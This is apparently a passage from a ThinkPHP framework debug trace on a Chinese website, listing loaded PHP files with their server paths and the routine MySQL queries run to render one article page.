  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000583s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.000531s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.000522s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.013703s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000601s ]
  6. SELECT * FROM `set` [ RunTime:0.007683s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000678s ]
  8. SELECT * FROM `article` WHERE `id` = 502498 LIMIT 1 [ RunTime:0.002875s ]
  9. UPDATE `article` SET `lasttime` = 1783011823 WHERE `id` = 502498 [ RunTime:0.025081s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 67 LIMIT 1 [ RunTime:0.000369s ]
  11. SELECT * FROM `article` WHERE `id` < 502498 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000615s ]
  12. SELECT * FROM `article` WHERE `id` > 502498 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.000585s ]
  13. SELECT * FROM `article` WHERE `id` < 502498 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.027647s ]
  14. SELECT * FROM `article` WHERE `id` < 502498 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.002585s ]
  15. SELECT * FROM `article` WHERE `id` < 502498 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.010013s ]
0.192759s